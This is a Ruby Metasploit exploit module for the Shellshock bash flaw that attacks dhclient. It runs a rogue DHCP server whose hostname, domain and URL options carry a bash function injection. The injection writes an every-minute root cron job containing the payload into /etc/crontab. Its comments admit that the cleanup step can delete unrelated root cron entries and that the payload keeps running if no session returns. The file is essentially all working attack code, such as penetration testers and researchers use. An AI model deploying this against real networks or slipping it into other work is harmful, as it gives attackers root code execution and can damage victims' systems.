##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
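class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DHCPServer

  # Characters in the payload that must not reach bash unescaped inside the
  # injected function body.  The original set covered redirection, grouping,
  # pipes, quoting and substitution ( < > ( ) | ' & ; $ ).  Added:
  #   \   otherwise `echo -e` treats a backslash in the payload as the start of
  #       an escape sequence and mangles the crontab line;
  #   `   command substitution would run while the line is echoed, not by cron;
  #   "   quotes do not survive the trip to bash (see crontab_command);
  #   #   after whitespace it starts a comment and truncates the command;
  #   * ? [ ]  unquoted glob characters are expanded against the cwd.
  # Every match is replaced by its \xHH form, which `echo -e` restores.
  UNSAFE_CHARS = /[<>()|'&;$\\`"#*?\[\]]/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',
        'Description' => %q{
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
          handles external environment variables. This module targets dhclient by responding
          to DHCP requests with a malicious hostname, domainname, and URL which are then
          passed to the configuration scripts as environment variables, resulting in code
          execution. Due to length restrictions and the unusual networking scenario at the
          time of exploitation, this module achieves code execution by writing the payload
          into /etc/crontab and then cleaning it up after a session is created.
        },
        'Author' => [
          'Stephane Chazelas', # Vulnerability discovery
          'egypt' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'References' => [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ],
          [ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],
          [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
          [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
        ],
        'Payload' => {
          # 255 for a domain name, minus some room for encoding: every escaped
          # character grows from 1 to 4 bytes (\xHH), and the function
          # prologue plus the echo/crontab wrapper take the rest.
          'Space' => 200,
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet ruby'
          }
        },
        'Targets' => [ [ 'Automatic Target', {}] ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-09-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # ARTIFACTS_ON_DISK: the crontab line is only removed once a session
          # comes back (see on_new_session); without one it stays behind.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [REPEATABLE_SESSION],
          'AKA' => ['Shellshock']
        }
      )
    )

    # The DHCPServer mixin normally lets the operator set these; here the
    # exploit fills all three with the injection string itself.
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')

    # Presumably what makes the framework invoke on_new_session for cleanup.
    self.needs_cleanup = true
  end

  # Runs when a session is established: removes the cron entry the exploit
  # appended to /etc/crontab on the victim.
  #
  # XXX this will brick a server some day: the sed pattern deletes EVERY
  # /etc/crontab line that schedules a root job every minute, not just ours.
  # If no session is ever created nothing is cleaned up and cron keeps
  # executing the payload line every minute until an operator removes it.
  def on_new_session(session)
    print_status 'Cleaning up crontab'
    session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
  end

  # Builds the Shellshock string, sanity-checks its size against the DHCP
  # option limit, hands it to the rogue DHCP server as hostname, domain name
  # and URL, then blocks while the server is serving.
  #
  # @raise [ArgumentError] when the encoded injection does not fit in one
  #   DHCP option
  def exploit
    injection = bash_function(crontab_command)

    # A DHCP option carries a single-octet length, so the value is capped at
    # 255 bytes; compare bytes, not characters.  One check covers all three
    # options because they receive the same string.
    if injection.bytesize > 255
      raise ArgumentError, 'payload too long'
    end

    # Work on a copy so the module's own datastore is left untouched.
    opts = datastore.copy
    opts['DOMAINNAME'] = injection
    opts['HOSTNAME'] = injection
    opts['URL'] = injection
    start_service(opts)

    # @dhcp is presumably set up by start_service (DHCPServer mixin); stay
    # alive until its thread exits.
    sleep 2 while @dhcp.thread.alive?
  end

  private

  # Shellshock trigger: a function definition followed by the command that a
  # vulnerable bash executes while importing the variable from its environment.
  def bash_function(command)
    "() { :; };#{command}"
  end

  # The command executed on the victim: append "* * * * * root <payload>" to
  # /etc/crontab.  Quotes seem to be completely stripped before the value
  # reaches bash, so the arguments are unquoted and every character bash or
  # `echo -e` would interpret is hex-encoded (\xHH); `echo -e` turns the
  # escapes back into the literal bytes.  The schedule asterisks are encoded
  # for the same reason, so they are not glob-expanded.
  def crontab_command
    cmd = payload.encoded.gsub(UNSAFE_CHARS) { |c| Rex::Text.to_hex(c) }
    schedule = (Rex::Text.to_hex('*') + ' ') * 5
    "echo -e #{schedule}root #{cmd}>>/etc/crontab"
  end
end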